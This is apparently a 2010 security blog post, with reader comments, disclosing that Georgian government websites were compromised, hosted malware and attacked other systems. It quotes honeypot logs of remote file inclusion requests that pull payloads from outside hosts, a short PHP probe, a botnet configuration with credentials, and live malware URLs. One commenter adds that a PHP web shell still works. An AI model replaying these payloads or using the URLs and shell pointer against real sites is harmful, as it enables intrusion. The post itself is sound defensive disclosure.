Georgia government sites hacked (and spreading malware)

*UPDATE: A few hours after this post, they removed the malware from justice.gov.ge and other sites. I am glad we had some effect.

You know, you would think that after all the attacks that Georgia suffered in 2008 they would be more careful about the security of their sites.

Well, not really. Even after I sent a bunch of emails to all their addresses that I could find and requested on twitter for contacts in the .ge government, nobody replied and they are still hacked, spreading malware and attacking other systems.

It doesn’t look like it is being caused by the Russians or anything like that. And the attackers this time didn’t defaced their web page. They just added some malware and scripts to attack others.

How do I know? We run multiple honeypots to detect web-based attacks and malware. And guess who started attacking us?

Analysis

I started seeing the first attacks on January 12th, trying to load RFI (remote files) from psg.gov.ge:

a.b.147.154 – – [12/Jan/2010:14:05:43 -0200] “GET ///?_SERVER[DOCUMENT_ROOT]=http://www.psg.gov.ge//album/respon1.txt? HTTP/1.1″ 200 6312 “-” “Mozilla/5.0″
a.b..147.154 – – [12/Jan/2010:14:05:46 -0200] “GET /xxx//?_SERVER[DOCUMENT_ROOT]=http://www.psg.gov.ge//album/respon1.txt? HTTP/1.1″ 200 7281 “-” “Mozilla/5.0″

A few days later I started seeing more attacks using malware hosted from www.justice.gov.ge

a.b.63.102 – – [14/Jan/2010:03:04:23 -0200] “GET /xxx*.php?page=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1″ 200 36 “-” “Mozilla/5.0″

That’s when I decided to look deeper at the issue. The respon1.txt is a common file used on RFI attacks:

$ lynx –dump –source http://www.justice.gov.ge//album/respon1.txt
< ?php /* Fx29ID */ echo("FeeL"."CoMz"); echo("FeeL"."CoMz"); /* Fx29ID */ ?>

Then I went to look at this “album” directory and that really shocked me. When you visit http://www.justice.gov.ge/album/ you can see a full collection of malware:


From the http://www.justice.gov.ge/album/bot.txt showing credentials to control a botnet, to flooding tools, remote shells, they got everything.

servban=array(“irc.allnetwork.org”,””,””);
$bot['admin']=”E_motz”;
$bot['pass']=”gila”;
$bot['inick']=”identnick”;
$bot['pnick']=”passwordnick”;
$bot['basechan']=”#vanjava”;

A look at the top of the simbah.txt shows a “funny” message: http://www.justice.gov.ge/album/simbah.txt

# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
# % private hackers pwned your box %
# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%

Even a remote proxy is there at http://www.justice.gov.ge/album/proxy.tgz

Attacking others

If that was not bad enough, by the end of January I started to see their own IP addresses attacking others:

87.253.63.102 – – [01/Feb/2010:04:41:09 -0200] “GET //include/write.php?dir=http://www.gk-rus.ru/images/laknat/.id?? HTTP/1.1″ 200 36 “-” “libwww-perl/5.805″
87.253.63.102 – – [01/Feb/2010:04:41:09 -0200] “GET /xxx/include/write.php?dir=http://www.gk-rus.ru/images/laknat/.id?? HTTP/1.1″ 200 36 “-” “libwww-perl/5.805″
81.95.173.72 – – [23/Jan/2010:16:07:29 -0200] “GET /xxx/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS;=&mosConfig;_absolute_path=http://krupuk.110mb.com/res1.txt?%20? HTTP/1.1″ 200 36 “-” “Mozilla/5.0″

So, at the end, we have some sites from the Georgia government hosting malware and these 4 attacking others:

www.psg.gov.ge – 87.253.63.102 (redirects now to justice.gov.ge)
www.justice.gov.ge – 87.253.63.102
moh.gov.ge – 81.95.173.72
mail.justice.gov.ge – 87.253.63.100

If you have any contact at the Georgie government, let them know about this post. I have been trying to speak with someone since January without success. Maybe with some extra exposure they will notice and fix it.

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.

  • Boris

    lol the batik.php still works. The password for the PHP Shell is inside the batik.txt. Dont know wich Provider they use, but it looks like that they need a big kick in their a.. or the Securityfolks of georgia.gov. Unbelievable.

  • http://clem1.be clem1

    Thanks to joomla plugins, delitosinformaticos.gov.co, a colombia gov website, hosts some malwares too. :)

    http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id2.txt

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net

    clem1: yes, I already contacted them about it. In fact, there is quite a few colombia .gov sites hosting it too..

  • http://www.blogger.com/profile/08224025684378318411 Chekura

    I know websites are not perfect as I've been working on such governmental projects in Georgia, but most of problems come from website "administrators". They don't know how to keep their PCs secure.

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net

    Chekura: Yes, nothing is perfect… But the way it is right now can easily be improved by just a little extra security precautions.